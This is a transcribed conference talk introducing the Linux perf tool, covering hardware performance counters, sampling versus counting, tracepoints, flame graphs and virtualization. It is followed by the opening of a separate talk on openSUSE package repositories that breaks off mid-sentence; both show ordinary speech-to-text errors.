open that file and I search for 0x3c, I will get this entry here. And the interesting things about this is first thing you can say is the PMU name. So it's one of the Arch Perfmon events. This is one of the architectural events that Intel is guaranteed will be available on the hardware. There's a description, count core clock cycles whenever the clock signal on the specific core is running. So it's not running if the CPU is halted and it's also worth mentioning that it's a subject of frequency scaling. So if you want to count at the reference cycle rate, constant rate, use the ref cycles event instead. By comparison, this is the same information from an Opto on AMD system. So we can see in this case that the event is 0x76. So the point I'm trying to tell you here is that there's not apples and apples. So even though you might be monitoring CPU cycles on multiple different machines, they're mapping to multiple different underlying event representations. Sometimes on the Intel architecture, these are mapped to architectural perfmon events. Sometimes they will map to micro architectural events that a micro architecture has well worldwide specific. Now, so each micro architecture has a different number of actual counters that can be running at a particular point in time. Sometimes there's one, sometimes there's two, sometimes there's four. And these counters work in basically the same counter works in two distinct ways. One is what's called a counted interface and one is what's called a sample interface. So the counted interface is basically, because it's counting and it counts the number of occurrences of that low level event that have occurred over a period of time. The sample interface is a little bit different. There's a bit in the counter which when set, when that counter overflows around zero will generate a local APIC interrupt. And what happens then is the instruction pointer in effect when that counter overflowed is taken. So basically we can load a particularly high value into the counter, start it running, allow it to overflow and get the instruction pointer that was in use at the time that counter overflow. And we use that to implement the sampling interface whereby we can sample so many times per second to get an idea where the program counter is over time. The frequency for the sampled interface can be specified in two different ways. So the first way is minus F which says take this many samples per second. The documentation will tell you that that's by default is 1024. It's not changed several years ago to be 4096. Minus C says instead of doing X number of samples per second, generate a sample every X occurrences of the underlying event. So if I did minus C, 1000 cycles, that would say generate me a sample every 1000 low level cycle events from the hardware. So first time we're going to use one of the commands, perf top. So perf top is a sampling view. So perf top is using the sampling counters similar to the standard unit top utility. So in this case here, the first thing to bear in mind is on this left hand column here, we have the overhead. So what this is saying is that while this sampling was taking place and a sample was taken 44.93% of the time, the sample was taken inside the kernel function, raw spin lock, 36.76% of the time it was taken in the kernel function, sync I know super block. So you look at this and you're like, oh my God, that's 44 and 36. That's almost 100. That's, you know, super busy. It's not. You need to go back to top in this case. And in this case, I was running sync in a loop and top will show you that in fact, the CPU was 0.1% user 4.1% system. So what you want to do in this case is add the minus n option to perf top and that will report you back the app in addition on an extra column, the absolute number of samples that were taken to come up with that 44% and 33%. However, sometimes it is CPU bound. This is an example of I was running open SSL speed default benchmark for open SSL and it's come back and it said, okay, so 51% of the time we were in this desk function, 26% of the time we were in another desk function and so on down. And if I turn on the minus n option here, it would report two orders of magnitude more samples per second being taken. So it's important to know if you're looking at something in perf and you get freaked out with a number of samples, go back and figure out, you know, is it actually CPU bound? If you're not CPU bound, then you're not going to get very far poking around in perf top. So, yeah, so it's possible through perf top to annotate hot code. So there are three essential viewing modes in the perf utilities. The default view, which is a curses view or two, there's a GTK view or there's a standard IO view. And I'm using the standard IO view in all these examples just because it's easier. But if you run perf top in the two or GTK view, it's going to constantly refresh itself over time or with a certain delay. And it's possible to hit enter. We go back. So if we go if we're running the graphics version, like move the cursor down and on the 51.02% and hit enter, it would open up a window and let me do an annotation view of the source code. And that annotation view would show me line by line assembly line and source line where the where in that function, these samples are being broken down. The problem with that is that it's refreshing in real time. And so you've lost your context from the top level as to what was hot code. So I don't tend to use I'm not talking about it, but I don't tend to use perf top very much. Another thing is enabling core graphs can be really useful. So what's happening with the sampling interface is it's sampling the instruction point. And so that's telling you, okay, I'm a I'm landing in this function, but it's not telling you why you are landing in this function. So enabling the minus G option to perf top to perf record. Every time the instruction pointer is taken from the APIC interrupt, it will also take the stack trace. So then when you're looking in the graphical tools, you can determine multiple path, it'll show you the separate paths on the stack that reach something. And the reason I'm not talking about this much is it's a later slide on what's called flame graphs. And flame graphs are a much better way of trying to visualize this core graph data. And I'll show you that later on. The other thing is getting core graphs working reliably is problematic. So basically, depends if your code is built with a frame pointer or not, most user space code is our sucer kernels are not because we want that register available for general register allocation use because that gets us about a 5 to 10% performance gain. So we instead run the unwinded, which is has an interesting history. And that's great for oops, decoding oopsies and decoding panics, but it's not great running 4000 times a second inside the enemy handler. So this is going to have some problems. So if you're doing a lot of core graph analysis using the minus G option, you may want to build yourself a custom kernel. So I run perf top usually very infrequently. I'll fire it up. If I think I'm CPU bound or fired up, I'll get a very brief idea about what the display is showing me. And then I will run perf record. Perfect record is again, a sampling using the counter sampling. And there are three primary different command line options here. There's perf record command perf record minus a command and perf record minus a. The first one of these is going to record samples only when in user space and kernel space by default, only when command is running and only on the CPU that command is running on minus a command is going to record samples when command is running, but it's also going to record it on all CPUs. So you can see if there's any other side effects coming from other CPUs while command is running and perf record minus a is just going to sample the entire system regardless of command on all CPUs. The default scope is to sample in kernel and user mode. So by default, CPU cycles is the default event. If you don't want to sample in user and kernel mode, you can use the you or the K qualifier after the event. And that tells the system in this case, sample CPU cycles only for user space and only when command is running on the CPU. So an example. So in this case, we're doing perf record, which is the sampling interface. I'm not doing frequency sampling. Instead, I'm saying, generate me a sample every 1000 occurrences of the low level event called instructions, and I'm running the lint pack benchmark. And the first thing I do after that is I say, okay, perf report minus D. So what happens is perf report generates you a file in your current directory called perf dot data containing the sample sampling information that was collected. Perth report interprets that file. So perf report minus D just dumps it out in ASCII form. And I'm brepping for the number of occurrences of the word perf record sample. So there's 3,048,011 samples that were taken in that perf dot data file. Now if we run perf report, we're using the minus n option, which is asking us to give us the absolute sample count as well as the overhead. And I'm using the standard IO viewer. You will notice that we have a much larger event count. That event count is exactly 1000 times the number of samples because I asked for a sample every 1000 occurrences. Okay. So we can see in this the function DAXP R was 48% of the time a sample occurred. That was on the CPU. 40% of the time the function DAXP UR was on the CPU. So I had mentioned previously that if you were using the GTK view or the TUI view, you could automatically hit enter on one of those entries and it will take you into the annotation view. If you're running on the standard IO console, you can instead run the separate command called perf annotate. So I've asked it perf annotate and I've asked it to annotate just the symbol DAXP R, which if we go back was the hot symbol 48.04% of the time samples were taken in that code. So I've asked perf annotate to annotate just that symbol for me because I built the code with minus g. I have the C source and the assembly course source interlaced with each other. And because I asked for the minus print line option, it is giving me the line numbers in the file that match. So on the left hand column here, we can see the sampling overhead relative to the 48% of the previous slide. So we can see that this line down here, we've got 10.31% on this add instruction, 10.37 on this move, 17.5% on this move SD. And what this shows us is that all of these assembly lines are related to line 599 in the source code, which is this dyi equals dyi plus DA times dx instruction. So what this is allowing us to do is look at our record data and then basically drill it into a source level annotation view and get an idea about what is actually the hot code on a line by line basis. Now, okay, so the previous example, I ran perf record minus C1000 minus E instructions colon U. So I asked it to sample only in user space. In this case, I've dropped my restriction on that. So I've asked it to sample in user and kernel space while this task, so I don't have minus a, so I'm only limiting the sampling to the CPU that Limpac is running on. But what we see now is the same thing, DAXPR, DAXPUR, still the hot code. The dot in brackets means it's a user space sample, but now we have some kernel samples occurring. And if we look at them, so we've got bottom half processing, we've got some soft IRQ processing, we've got some IRQ processing, idle CPU. So what we don't have is any syscalls, which is not surprising because Limpac is a floating point benchmark. If we were running a bunch of syscalls out of this task, we would see a lot of syscalls showing up in these kernel samples. So one of the common questions you get asked is, well, okay, great, I've got these performance counters and I've got all these events, but what events do I monitor? So I'm going to talk briefly about that. One of the most common things you're going to want to monitor is what's called instructions per cycle. So all of these CPUs are pipeline superscaler machines. So basically there's multiple steps that you're going to do, especially instruction from memory decoded, executed, fetch the memory operands and do the write back. These are all occurring in separate stages in the pipeline. And if there's enough instruction level parallelism, it will try to fill the pipeline and you can execute more than one instruction per cycle. This is a common enough usage of these two events. We've asked perf stats. And this is the first time we've seen perf stat. Perf stat is the counted interface. So it is not doing sampling. Instead, it is giving me the number, the absolute count of the events that occurred while the task was running. And I've asked it to limit its sampling to just use a space for the events, instructions and cycles. And this is a common enough comparison that perf actually averages this out for us automatically and comes back and says, okay, in this case, this task ran and had 2.73 instructions per cycle. So the more instructions per cycle, the better you are. Another thing that is useful is cache misses relative to cache references. So I have a genius piece of code here. And what it does is it basically allocates a array, a million elements times a multiplier times the size of int, which is eight. So when mult is one, that's an eight million byte allocation when mult is eight, that's a 64 megabyte allocation. It allocates that on the heap. And then it runs a loop randomly writing all over that array. The purpose is to test what the cache miss cache hit reference is. So once again, on the bottom here, we can see down here, we run perf stat. We're asking for the cache misses event moniker for user space only, the cache references moniker for events only. And again, this is a common enough comparison, the perf is going to do the averaging for us. And it says we have a cache miss rate of 54%. So one thing to bear in mind, so the reason I did this, the machine I was running this on was a E5 2420 V2. And it has a quarter meg L2 cache per core and 1.5 meg L2 cache on the die. And then a 15 meg last level cache L3. So I've got a 15 megabyte last level cache. I'm doing an eight, a 64 megabyte allocation when mult is eight. If I drop mult down to one, that results in me having an eight megabyte allocation, which entirely fits within the 15 meg last level cache. And in that case, it reports 0.001% cache misses. If I change mult to two, which in this case, I'm 16 megs on slightly outside my cache size, I get a 0.003 miss rate. Now, I had said earlier when we looked at the output of perf list, there was something called raw events. These are events that are not described by default in the perf list output. So once again, I'm running the show event info command from the live PFM develop package. And I'm looking at this particular event, and it is mem load Uops retired. One thing to note, it is an Ivy bridge specific micro architectural event. So it is not part of the architected perfmon. And it's counting memory load Uops retired. And there are a bunch of Umask qualifiers that I can specify to give me level one hits, level two hits, level three miss misses and so on. So I have a short loop here saying run user bin event to raw, which is the decoder which will decode mem load Uops retired colon L2 hit. And it will give me the raw event back for those. So I run that and it gives me the four raw events, 5302 D1, 5310 D1, 5304 D1, 5320 D1. And I can now run perf stat specifying those four raw events, again, scoping each one to user space and it comes back and tells me that I have just almost 3 million L2 hits to the L2 cache, 412 million misses on the L2 cache, 187 million L3 hits, 224 million L3 misses. And one thing that's really important about this is this last column down here in percentages. So I mentioned that each micro architecture has a different number of performance counters. So this one actually has four performance counters, but not all performance counters can run all events. And it turns out on this system, these performance counters for these particular events, only two of them can run the events. So I have four events, two counters that can run them. So the kernel is time slicing. While bad cache is running 50% of the time on one counter, it's using 5302 D1, 50.01% of the time it's running 5310 D1, and so on. So the kernel is telling you here, these are the ratios of the time that the actual event was physically running on the counter, and then it scales the numbers up to give you the effect of it running 100% of the time. So if you don't like that, your options are to do multiple runs with fewer counters or pick a different event which can run on more of the performance monitoring counters. Another thing that is worth monitoring is branch misses relative to branch instructions. So we talked about the CPU being pipeline. So the goal is to keep the pipeline full. When the CPU encounters a conditional branch, it has to say to itself, well, I want to keep the pipeline full. How do I do that? It does that by trying to predict which of the two ways you'll go in the conditional branch statement. And then it starts loading into the pipeline the instructions from the target of the destination branch that is predicted. So if that branch prediction fails and you take the other branch, the kernel has to eject those instructions out of the pipeline. And that affects your instructions per cycle. So here we have some code again, 1,024, a million times 20 cycles of this code. And all this code up here on the top is doing, I just abbreviated it so it fit on the slide, it's basically just a randomized eight-way branch. So each time we run through this code, we will randomly take one of the eight possible branches. Just try to make it hard for the branch predictor to work. And so we run it using perfstat. And we specify the branches moniker for user space and the branch misses moniker for user space. And I don't get back the results I thought I was going to get because I've got 490 million branches and 19 million branch misses. And I'm calling this function funk 20 million times. So I was expecting way more. The reason, anybody know the reason? The reason is that I am asking stats to count me the events that occurred for the entire execution of the function branch 8x. So back in this thing here, I have 20 million calls to run. I have 20 million conditional branches occurring for that for loop. So what this is doing is this is basically skewing the results so I have a huge number of branches that are taking place. But the ones that I want to monitor up here, there's no way to do that because perfstat is giving me the counted number of events for the entire code execution. So we'll talk later about a way of, oh, no, actually. We'll talk later about this with Pappy. But one thing we can do instead of using the counted interface is run the same task but instead run the sampled interface. So instead of running perfstat, we're going to run perfrecord. We have no minus f option so by default it's going to take 4,096 samples per second. We're asking it to sample branches and branches for user space only. And it comes back and it tells us, okay, so in this execution, 42.5% of the total branch instructions executed were in the function funk. 21% of the total branches executed were in the function main. But 73.3% of all of the misses were in funk and only 23% were in main. So this is showing us kind of what we were hoping to show which is that the effects of the forcing the branch prediction to fail inside of function funk, we see a much higher number of branch misses as a percentage. There is something called sampling skew or skid. And what that means is we talked about using the sampling counters and when the counter overflows, it records the instruction pointer. Because of the way that the pipelining is taking place, the instruction pointer is not always guaranteed to be correct. It can be a few instructions off. So if you're looking at your assembly level code output in perf annotate, the sample could be showing the wrong instruction. There was a way to solve that. On Intel, it's called PEBS, precise event-based sampling. On AMD, it's called IBS, instruction-based sampling. And basically what happens is we looked previously we could do the colon U or the colon K qualifier on an event. There's also a precision qualifier, a P, a PPP and a PPP. What this says is if you specify, say CPU cycles colon P, it says, okay, I accept the skid. But when you give me the skid, when you give me the fact that the IP is off by a little bit, make it off by the same amount every time. Number two says, please give me zero skid. I don't like zero skid. But the kernel is free to not give you that. And three is I require zero skid. So right now, only zero, one and two are supported in perf. Now, if you also, not every event supports PEBS. So again, if you run the show event info command that we've been using many times, you will see a keyword in there precise as the flags for that counter. And that means that it supports PEBS. So moving ahead, so remember we looked at the output of perf list and we had software events, we had hardware events, and we also had trace points. So these are the static F trace code points that the kernel developers are deemed to be of interest to debugging code. So if I do perf list trace point on my system, I get 1486 different entries for existing kernel trace point events. So I've just broken it down and chopped a bunch out here. But we have a block IO back merge from the block subsystem. We have skid colon skid switch, which is invoked whenever the scheduler performs a task switch. And for every sys call in the system, we have a trace point for its entry and a trace point for its exit. And also what we have is a file in sys kernel debug tracing events, and then the event name called format. And if we cut that file under the print here, that shows us what the kernel is going to output into the ring buffer for F trace every time that trace point is active, if it's enabled. So we can do some cool things with, so this, these trace points are primarily for the fusing F trace, but perf integrates with them. So this first command is using the counted interface perf stat. And it says, okay, minus a. So I want system wide. I want you to record system wide. Every time the sys enter star trace points, this is a glob. So every time any entry point for any system call is encountered, I want you to count that and sleep 30. So over 30 seconds, basically tell me how many times a system call was entered system wide. This matching with the wide problem in the userland. That in the userland, in userland, because, because it actually expands out and you'll actually get a line in the output per sys call. So it's been done in userland. Good question. The next one of these, I've dropped the minus a. So I'm not doing system wide anymore. I'm perf stat. So give me a counted count of the number of times that the sked switch event was occurred while benchmark was running. So how many times did the schedule of run to involuntarily context switch me out while benchmark was running? Now you might say to yourself, okay, so we've got these trace points. They're in the kernel. They're in fixed locations in the kernel. So why would I have any interest in running perf record? Because perf record is a sampling based interface that samples the instruction pointer a certain number of times a second, but I already know where these trace points are. So it's not a lot of interest in sampling the instruction pointer. So they already know, but it does have a use in this case, I'm doing perf record minus a. So I'm sampling system wide. I've asked it to give me call stacks. So every time instruction pointer is taken, it'll give me the stack that led to that point. CIS calls, CIS enter, right. So event is the entry point for the right CIS call. And now we go back to that format file I talked about in the previous slide. And this is the format that's output here. And one of the fields is count. And that is your count argument to your to your right CIS call. And so I can add an optional filter onto that. So what this is saying is sample me 4096 times per second. No, sorry, sample me every time the CIS enter right trace point is encountered system wide, but only when the count argument is greater than 1024. And for each of those show me the kernel trace that led us to that trace point. So that can be a really useful use case for using perf record together with trace points. Now, yeah. Do you have any idea how much running this tool is a system wide collection impact? It does, but F trace is designed to be extremely low overhead. So I mean, you're only monitoring, you're only activating one trace point to that point. I'm only activating the CIS right trace point. If you did, if you asked it to filter every single CIS call, that's going to have an effect. And if you enable every single event, it's going to have an effect. But F trace is designed to be low overhead. So it is it is it is significantly less overhead than you would think it's designed to be turned on and produce lots and lots and lots of data with minimal system effects. But obviously not zero. Yeah, so these trace points are important useful enough. There's actually a perf sub command called perf trace. And this is basically doing the same thing as S trace, but it's not using the P trace API. And that has some interesting side effects. Number one, it is way lower overhead than P trace P trace has huge overhead. It can monitor system wide. We've already seen that you can do minus a with S trace that all you can do is run a particular command or attach to an existing command. And it can filter based on CIS call duration. So what I've got going on here is I got a DD command reading from dev zero writing to slash temp one K block size 10 rights. And I asked it perf trace to tell me the CIS calls that have a duration of longer than one microsecond. And it comes back and it says none of them did. Now in the end, I add on to the end of it here, con equals F data sync. What that says is when you finish to do a sync CIS call. So here we see one line of output now. 6.035 milliseconds in duration, a sync call took place. And finally, instead of doing F data sync, I can say oh flag equals sync. What that says is I want you to do synchronous rights all the time for data and metadata. Every right should be fully synchronous. So now when I run it, every single right CIS call comes back 6.127 milliseconds for the first and then the rest of them are all over one millisecond. So this is an example of using perf trace, which is basically using these lower level trace point events to automatically give me an idea about what CIS calls are taking place on the system. And there's also a really cool minus S option, which will give me a summary of all the system calls. So it produces this table here of how many system calls, the total, the minimum run, the maximum run, the deviation and so on for all of the CIS calls that were executed during this run. Finally, so I said these F trace points are predetermined by the kernel developers. If you want to add another one, you need to go into the kernel source code, you need to put in a new trace point. Sometimes you don't want to do that. Sometimes I want to just dynamically monitor something new. So in this case, what I'm doing is I'm running perf probe copy from user. Copy from user is the kernel code point that copies data across the CIS call boundary from user space. So I do perf probe copy from user and it comes back and it adds what's called a K probe and it comes back and says, okay, this probe is now called probe colon underscore copy from user and you can run it in the sampling interface if you want to. Instead, I chose to run it in the counted interface, perf stat minus a and a duration of one second. What this says to me is how many times in a one second period system system wide did we enter the copy from user function. Finally, last slide on the basic stuff, perf script. So remember we said perf record produces a perf dot data file in your current directory which perf record operates on. Perf script by default will produce an ASCII dump of that perf dot data in a format suitable for passing with other tools. Now there are already a bunch of pre-canned scripts on the system and you can look if you want on your system now you can do perf script minus L and it will list you these pre-canned Python and perf scripts that have already been created. So you say, well, I'd like to write a new command and that sounds kind of daunting because I don't know what's going on. Fortunately, there's a great option perf script minus G, Python or Perl and what that will do is it will open the perf dot data file and it will look at what types of events are recorded in that perf dot data file and it will generate you a skeleton Python or skeleton Perl script with an entry point for each one of those events. So all you have to do then is go fill it in with whatever code you want to do and then you can install it into the system and then you can use that script by saying perf script record your script name perf script report your script name and you can have that script built into the system. Okay, so any questions? Okay, so I've got some advanced stuff that I wanted to talk about. We went back to that. Remember we talked about that slide where we first talked about call graphs and how they were problematic. One of the problems with call graphs is that there can be so much data that you can't make sense of it in the annotation view. It's a perf annotate member with the command we ran and they broke it down by line number, but there's so much data that it's just not, you can't figure out what's going on. So a guy called Brendan Greg who's a performance analyst at Netflix has come up with this thing called flame graphs and that's the URL there. So what we do is we run the record interface system wide minus G. So I want call graphs, the event is cycles, kernel space only sampling, and I'm running a SCP of a 10 gig file from my workstation to another host. After that we ended up with a perf.data file in that current directory. We could do perf report on that if we wanted. Instead we do perf script. We pipe it to these two scripts that Brandon's come up with and that produces an interactive SVG file that we can open in Firefox. And it looks like this. So this is a flame graph. So this is a graph. It's kind of complicated. Each box here, don't worry about the colors. They're not actually very meaningful, but each box is a entry on the stack and your Y axis is reflecting the depth of stack. So higher entries are children, lower entries are parents. And the X axis doesn't show time in the normal sense that we'd expect it to do. Instead, it's X axis is alphabetically sorted and what it shows is the amount of time, the amount of time in terms of number of samples that that stack entry showed up on the stack. So the bottom entry here is our main function. So sure enough, 100% of the time it showed up on the stack of the bottom entry. And then the next entry on the stack half the time was one option. The other half the time it was Swapper. And what tends to happen is it'll form these peaks here. And what those indicate is that in this case here, TCPv4 receive doesn't in fact do a lot of work itself. Mostly it accumulates samples from its children running below it. But occasionally we'll get entries like this guy here. So we're interested in looking at leaves like this. So that leaf there is on the top of the stack. So it's hot for a significant number of samples because the X axis is a number of samples. And that's copied from user. So obviously we're running a SCP of a 10 gig file or sucking the data out of the file system, which we're sending over the network. So we're interested, this shows us basically a breakdown of all of the paths. And that is extremely useful if you try to get a high level visualization of your core graph data. The next thing I'm going to talk about is something called PAPI or self monitoring. PAPI is the performance application programming interface. And that's it's hosted that URL there and it used to originally was intended to run over Perfmon. And then when Perfmon kind of ran into a brick wall, it got retasked to run over Perf. But because it was running over Perfmon and Perfmon exposed you the raw event names and Perf doesn't do that. They came up with their own different event aliases called event presets that have no correspondence with the performance. But what PAPI allows you to do is a library, it allows you to insert calls from your code into particular points in your source code say, okay, start running these counters now. Okay, at this point in the code, read this counter, do some work, read this counter again and subtract the difference and report the results to me. So if you remember back to that example function, we had a few slides back where we had a function called funk. Remember, we had that eight way branch in there and we tried to run Perf stat on it and we got a huge number of results. So the obvious thing you do then is say, okay, let's just put a PAPI call above the eight way branch saying, read me the counters, I'll do my eight way branch and then I'll do another call to PAPI again to read the counters and I'll display the difference. Unfortunately, that doesn't work either because the library calls to PAPI have an enormous number of branches in them. So PAPI is somewhat useful for putting around code pieces inside your own code, but it has limitations. There is an excellent kernel implementation that was added in these two mainline commits. And if you want to know how that works, you need to look in the self test code and there's a file called tests.rdpmc.c in the kernel source code. And what this code basically does is maps a kernel page for consistency and then allows you to directly call rdpmc from your user space code. But you can only do it to monitor yourself. You can't monitor anybody else. But the advantage is way too complicated to talk about here, but the advantage it has is that the code is not a library code. So you've got an idea about the overhead of that code and how it's going to perturb the performance counter results that you're getting. Oh, and there's an excellent paper by Vince Weaver, who's one of the PAPI developers. This paper here, if you're interested, is worth reading all about the performance overhead of Perf versus Perfmon. Another thing that's worth talking about is off-CPU analysis. So all the stuff we've been talking about so far is I'm running on the CPU, so I'm monitoring events, I'm monitoring cache misses, I'm monitoring branch misses relative to branch instructions. And that's really interesting stuff, but sometimes it's just as interesting to find out why my code is not running. And generally speaking, the goal of your code is I want my code scheduled and running on the CPU as often as possible. So there are lots of reasons why your code won't be running. There's disk IO, you've got some kind of task to task synchronization going on, the effects of the virtual memory subsystem on your code, or involuntary context switching. So there's a really excellent analysis here, Brandon Greg has written this paper which shows how to use PerfTrace plus PerfInject to monitor the scheduling system calls, and you can produce flame graphs using this approach, showing the effects of the scheduler on your code and how much time your code is off the CPU. So I'm just mentioning this here, it's an advanced topic, but it's just as important to know why you're not running as to know why you are running. And final slide. So virtualization. So if you're virtualizing, you need to virtualize all of this performance monitoring hardware underneath the surface, and that is hard. So if you're in Zen and you're in DOMU and you run PerfList, you're going to see software events, you're going to see trace point events, but you're not going to see any of the performance counter events because they're not virtualized. Things are better in QEMU if you're using KVM, which is stands for Kernel Virtual Machine. So there's a wonderfully undocumented option. There's a minus CPU option on QEMU. So you could say minus CPU QEMU 64 is the default CPU comma PMU equals on. And that's not documented anywhere that I could find. But what that does is that tells QEMU to virtualize the CPU ID instruction to report back that yes, this CPU supports architectural performance V1 through V4. And so then in your host, you can do PerfList and you will see those event monikers for CPU cycles and so on and so forth. You can also do minus CPU host, which fully exposes the underlying host hardware to QEMU. In that case, you can see your micro architectural events also. So you can do the raw events that we showed. If you're stuck on Zen, there is slight salvation. There's a subcommander to Perf called Perf KVM. It does sampling only. So you cannot do the counted interface. It's only sampling. There's no visibility on individual guests. It can break it down by host or guest cumulative. But it allows you to basically do sampling of what's going on inside the host space or what's going on inside the guest space. It is kind of hokey, though, because you have to copy the symbols and module information file from your host into the host, which is awkward. But if you're running Zen, Perf KVM is about as far as you can go. If you're running KVM with QEMU, things are a lot better. But remember, it's being virtualized. So the results may vary compared to bare metal. Anyway, that's my talk. I hope it was okay. Any questions? So you can use Perf pretty much only if your workload is CPU bound. Otherwise, you don't. The question was, so you can use Perf only if your workload is CPU bound. That is not true. I mean, the Perf trace points, for example, if you expose the scheduler trace points and you use Perf commands, then you can expose a lot of information about the code that's running that has nothing to do with it being CPU bound. And I talked about the paper. I would encourage you to read this paper here, because in this paper here, his page here, he talks about using Perf trace and also Perf inject to do similar to what you could do with system type in terms of determining off CPU analysis. So determining when your code is not running on the CPU. So you can use Perf in cases when it's not CPU bound. Now Perf top, Perf record, Perf stats are generally going to be focused on CPU bound code. But the Perf trace and that side of things is nothing to do with being a CPU bound. Does that answer your question? Yes. Thanks. Any other questions? Yes. So is Perf completely multi-architecture aware then? Oh, good point. Yes. So it started off being x8664 only, but now pretty much, that's one of the differences between Perf commands. So now you've got every architecture for PowerPC, for ARM, for S390, for x86 stuck in the kernel tree in terms of logic of how to handle the underlying hardware counselors for the microarchitectures. In Perf, this was all stuffed out in libpfm. Now it's all stuffed in the kernel, but yes, it is. It's supported on S390, PowerPC, ARM, ARM64. It can be considered to be a general purpose replacement for O-profile, basically. The one architecture it doesn't work on is IA64 and that is still using Perfmon. So there is no Perf for IA64. So if you find yourself working on that, you've got to go download libpfm and pfmon and use that. Thanks. If the code does not run on the CPU, where can it run on? Like, what are the other scenarios, for instance a GPU or what else? Yeah, I must admit I don't know about the GPU case. I don't think that there is any support in there, any Perf support for analyzing the performance on GPUs. So yeah, but so basically if it's not on the CPU, it's always on the GPU? No. If it's not on the CPU, then you could have been in the process of being scheduled. So you're waiting for something. So you're on some sort of IO wait channel, you're waiting for virtual memory, you're waiting. It's like I mentioned on this, going back to this slide here. Oh, here. So there are many reasons why you may not be running on the CPU. You might be waiting for disk IO to complete. You've performed some kind of synchronization with another thread or another task and you're waiting for that synchronization to complete. You've performed some operation that's invoked to page fault and you're waiting for that to come back. When that happens, the kernel is going to schedule you off the CPU, schedule somebody else onto the CPU who can run rather than having you busy loop doing nothing. And the other thing is the kernel is going to schedule you off the CPU just because it's got 500 other tasks that it has to get on the CPU. So there's lots of times. So that's the main difference between, if you do Perf record command and Perf record minus a command, that's the primary difference. You're going to see the effects of the kernel in doing other bookkeeping type stuff while your command was running because one of the things that's going to happen in the kernel while your command is running is that you're going to be scheduled on and off the CPU. And if you don't do the minus a option, if you don't sample in the kernel, sorry, if you don't sample in the kernel events, you won't see that. If you limit yourself to just use a space sampling. Does that make sense? Yeah, yeah, yeah. Thanks a lot for clarifying. No, no, you're welcome. This is Giovanni, by the way. Hello, everybody. I've heard about another tool called Barclay packet filter. Yes. And now there is originally in the networking domain, but now expanding towards a performance monitoring. And I wanted to know what would be the overlap of. Excellent. I'm going to do a talk on that in the labs conference, but it is way, that's way, what he's talking about is something called EBPF. So has anybody here run TCP dump? Has anybody run that? So TCP dump use the old Berkeley packet filter, which was and what happened in the kernel more recently is something called EBPF came up, which is basically a stack type programming language, which is jitted inside kernel space. And so you can do all kinds of cool things inside this jitted code. And there is a new perf interface to EBPF that allows you to integrate. It's, it's, I could talk for three or four hours on Perth, but there is a perf interface to EBPF and you can go look at it if you want. But yeah, there's also something called IPT, which is Intel processor trace, which is extremely low level processor tracing feature, which is integrated. Like I said, Swiss is a purpose of Swiss army knife. There's a million and one different things it does. I just focused on the real basic stuff, but EBPF is a, is another cool feature that Perth can use. Any other questions? Okay. Well, thank you very much.
The perf tool was introduced with kernel version 2.6.31 but several major releases later, knowing which of its many features to use when and how to interpret the results is still challenging for many users. In this talk I will present a brief overview of the performance counters provided by modern x86 hardware followed by a discussion of the various monitoring capabilities offered by perf, when to use which and how to begin to interpret the results. This is intended as an introductory talk for those with no significant experience using perf or undertaking performance analysis. An understanding of programming and architecture basics will be helpful. [This talk could be extended to an hour if required, it could also be presented instead as a workshop or as a talk plus an associated workshop]
10.5446/54615 (DOI)
Alright. So, if you don't know me, I'm Richard Brown. I'm the OpenSuser Chairman, and I'm going to be talking now about why we should be building our distribution properly and really why we should be discouraging the use and the building of additional repositories. This presentation is a little bit like a football match. It's a slide deck with two halves. There's going to be things I'm going to say that people aren't necessarily going to agree with, people might not like, and I really need to ask any questions, any counter points, please try and save it to the end. There will be time for questions, and hopefully we'll get to an ending that we all like, but I don't really like football, so I much prefer rugby, and there will be blood. There are things here that we really need to fix, problems that have been lingering in the project for ten years, and it's about time we did something about them. And I want to start from the user's perspective. This fellow, kind of possibly one of our typical users. And the average typical OpenSuser, as we saw with the slides earlier this week, is normally using Leap, and from the look of things, they're quite happy, everything works, no problems whatsoever. But sooner or later they're going to find something else they want to use that for, some other bit of software, maybe they're looking on Reddit, maybe they're reading hack and use, whatever, some new bit of technology comes about, or they just hear about it for the first time, and they want to install it on their OpenSuser machine. And when everything works properly, it's a relatively easy case of finding it. For example, using zipper, a nice simple zipper if Chromium will find Chromium in our distribution repositories, nice and easy to install from there, or they use YAST, or of course if you're a GNOME user, we also have the GNOME software application store. And this is easy, and this is good, and then it's only one click or one command away to install everything, and everything is fine and simple, and everybody is happy. But what about when the package isn't in our distribution repositories? When it's not there, like here, elastic search, zipper if elastic search finds nothing. What do you do next? We haven't got that written down anywhere. We actually have no easy solution, the tools don't tell you anything, there's no simple documentation, we just expect our users to magically know this. And this isn't just a problem that OpenSuser has, so when talking about SLEE, SLEE12 has a very fancy new set and new feature set in SLEE12 where there are additional modules being released at a different cadence with a different support level so SLEE customers can get certain software stacks at a faster pace, things like new PHP, advanced systems management tools, et cetera, et cetera. But if you're using it from a user's perspective, this is the first time you realize you need to install a module when you find it isn't in the main base distribution. And if you use the standard tools, you go to yes, for example, there's actually nothing obvious there on even how to find the module. Now, you might be a smart user and realize that modules are delivered by SEC, so you put SEC in the search box and you find nothing. You might look for modules and find nothing. You might look for add-on products and you find a very nice add-on products window, but actually that's not the one for modules, that's the one for add-on products like HA and for GEO. And it's only if you type in the registration part, which luckily this bit is documented, that you then find the screen for adding extensions to your SLEE machine. But then you don't know which one to actually click on, because absolutely nowhere do we have a list of which packages are in which edition or one of these repositories. Now, for OpenSUSE we share some of these problems, but we have a nice magical tool as part of the software OpenSUSE.org search, which lets you find this stuff. But even then we have some very serious problems with this. For example, looking for elastic search, you get one, two, three very clear different versions, a whole bunch of extra modules when all you really wanted was actually the top one. And in fact, the list goes longer and longer and longer. When you click on that, you get this lovely page, which actually has a little bit of information about the package. It doesn't have a screenshot, because obviously it's a console application, it shouldn't need one. And you don't really actually get any information about what to install where, apart from this big nasty button saying show unstable packages, which you then click on, and you get this warning which most people ignore, that you shouldn't really be using this, you shouldn't use unofficial repositories, it may be unstable, it may be experimental. And in fact, if you're using a JavaScript blocker, this won't even appear, so people don't even know about it in many cases these days. And then what this is then doing is going to OBS, looking at everything we have in home repositories and developer repositories, and trying to do its best at showing what is available there. And every single column on this is wrong. For starters, it's not ordered, it's got home repositories and developer repositories in pretty much a random scattering, it's not alphabetically listed, it's not listed by version numbers, 1.75 there is higher than 1.44, but 1.35 is listed above it. The architecture column there is totally and utterly wrong, develop languages, Python does not only build for ARMv6, it builds for everything. And then at the end you have a one-click install. Now for this example, I've kind of assumed that the user in question is a moderately skilled and experienced open-suzi user, so they probably know how the distribution is put together, they know that a developer project is where we're baking stuff, where developers are working on stuff. So in this example, the user then clicks on a one-click install. And click number 1, it's obviously downloading 